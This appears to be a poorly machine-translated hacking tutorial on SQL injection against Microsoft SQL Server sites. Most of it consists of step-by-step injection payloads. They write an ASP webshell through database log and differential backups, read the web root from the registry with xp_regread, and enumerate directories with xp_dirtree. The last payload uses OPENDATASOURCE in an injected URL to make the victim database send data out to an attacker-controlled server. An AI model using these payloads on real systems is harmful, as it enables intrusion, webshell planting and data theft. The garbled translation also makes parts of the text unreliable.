DBO Privilege log backup dedicated one sentence Trojan-cold Dragon Network produced before the blog station because of the program confusion changed to anti-Virus alliance after this blog based blog site thanks to the attention

Special sentence for spare part Add a response.end will have a different effect, that is, after inserting a sentence all the code is invalid, in a sentence here to stop, also reduce the size of Webshell.

Seven steps of the Webshell standard for log preparation: 1.InjectionURL '; ALTER DATABASE XXX set RECOVERY full--(set SQL to log Full recovery mode) 2.InjectionURL '; Create table cmd (a image)--(Create a new cmd table) 3.InjectionURL '; backup log XXX to disk = ' C:\cmd ' with init--(reduce the size of the spare data) 4.InjectionURL '; insert into cmd (a) VALUES (' "16 characters inserted into the table 4, declare @a sysname,@s nvarchar (4000) Select @a=db_name (), @s= ' C:\Program files\common files\microsoft Shared\Web Server extensions\40\isapi\hsqq.asp ' backup database @a to disk = @s with Differential,format-a differential backup of the database, and a backup save path tentatively to the C-drive directory , the file name is hsqq.asp. 5. drop table [jm_tmp]--Delete this table. Web site physical path Read code: 1. drop table [jm_tmp];create table [jm_tmp] (value Navrchar (4000) null,data nvarchar (4000) NULL)--CREATE TABLE 2. Delete [Jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ' HKEY_LOCAL_MACHINE ', ' system\controlset001\services\ W3svc\parameters\virtual Roots ', '/'--Inserting a site directory into a table field 3, and (select top 1 cast ([data] as nvarchar (4000) char (124) from [jm_tmp] order BY [data] desc) =0 '//out field 4. drop table [jm_tmp]--Delete this table. Disk Directory Read code: 1. drop table [jm_tmp];create table [jm_tmp] (subdirectory nvarchar (+) null,depth tinyint null,[file] bit NULL)--Create TABLE 2. Delete [Jm_tmp];insert [jm_tmp] exec master. Xp_dirtree ' C \ ', 1,1--Insert the folder and files 3, and 1= (select top 1 cast ([subdirectory] as nvarchar (+)) char (124) cast ([file] as nvarchar (1)) char (124) from (select T OP 1 [subdirectory],[file] from [jm_tmp] ORDER by [file],[subdirectory]) T order BY [file] desc,[subdirectory] desc) '//Burst out Name of the first folder 4, and 1= (select top 1 cast ([subdirectory] as nvarchar (+)) char (124) cast ([file] as nvarchar (1)) char (124) from (Select to P 2 [Subdirectory],[file] from [jm_tmp] ORDER by [file],[subdirectory]) T order BY [file] desc,[subdirectory] desc) '//Burst out Two folder names 5, and 1= (select top 1 cast ([subdirectory] as nvarchar (+)) char (124) cast ([file] as nvarchar (1)) char (124) from (Select to P X [Subdirectory],[file] from [jm_tmp] ORDER by [file],[subdirectory]) T order BY [file] desc,[subdirectory] desc) '//Burst out X folder or file name 6. drop table [jm_tmp]--Delete this table Web site physical path Read code: 1. drop table [jm_tmp];create table [jm_tmp] (value Navrchar (4000) null,data nvarchar (4000) NULL)--CREATE TABLE 2. Delete [Jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ' HKEY_LOCAL_MACHINE ', ' system\controlset001\services\ W3svc\parameters\virtual Roots ', '/'--Inserting a site directory into a table field 3, and (select top 1 cast ([data] as nvarchar (4000) char (124) from [jm_tmp] order BY [data] desc) =0 '//out field 4. drop table [jm_tmp]--Delete this table. Db_oner permissions during the injection process and the host is not together with the database pointers Actually. Even if the database and the Web are not in one piece, there is a chance to do it. It's not a chance. General server install the system or something. You're going to install IIS? Column C. See if there is any inetpub this directory. I knew he had IIS installed. But I don't know if he's IP? What do we do? This can be done by pinging the Web server. Sweep the 1433 port of this C segment. See which one is open. However, this method is not good. Many hosts now have firewalls enabled. 1433 port you can't sweep it if it's open. You can use the OPENDATASOURCE macro to make the other person's SQL connect to their own database. Since the connection can be established. You can get the IP address of the database server. Let's have a try. There are a few premises to say. First, you must have a public network. IP. And the open 1433 port is guaranteed to be accessible to the external network. Good condition. Just start doing it! I'm doing this station now. 100% data and the Web are not in one piece. But I saw the Inetpub folder from the C drive. This database server has IIS installed. But I can't get his IP. How to do it. Simple. Start by using the method described above. Open Query Analyzer input Create DATABASE hack520 CREATE table zhu (name nvarchar () null); CREATE table J8 (id int null,name nvarchar (n) null); Point execution. A hack520 library name is created. and Zhu J8 two tables. Zhu has a field named name. J8 also put two field names. One is the ID one is name. OK, now you can start connecting. ~~~~~~~ First look at this SQL statement insert INTO OpenDataSource (' SQLOLEDB ', ' server= your ip;uid=sql user; pwd=sql password; database= established library name '). Library name. Table name ' executed statement ' Well, let's start now. http://www.xxx.com/news.asp?id=126 ' Inser ... asource (' SQLOLEDB ', ' server=219.149.xx.182;uid=sa;[ Email protected] #77169;d atabase=hack520 '). hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- Execute on IE. this time the other side will be connected to the SQL Server of my machine. No, believe it? Netstat-an, look. Enter the command under CMD: Netstat-an | Find "1433"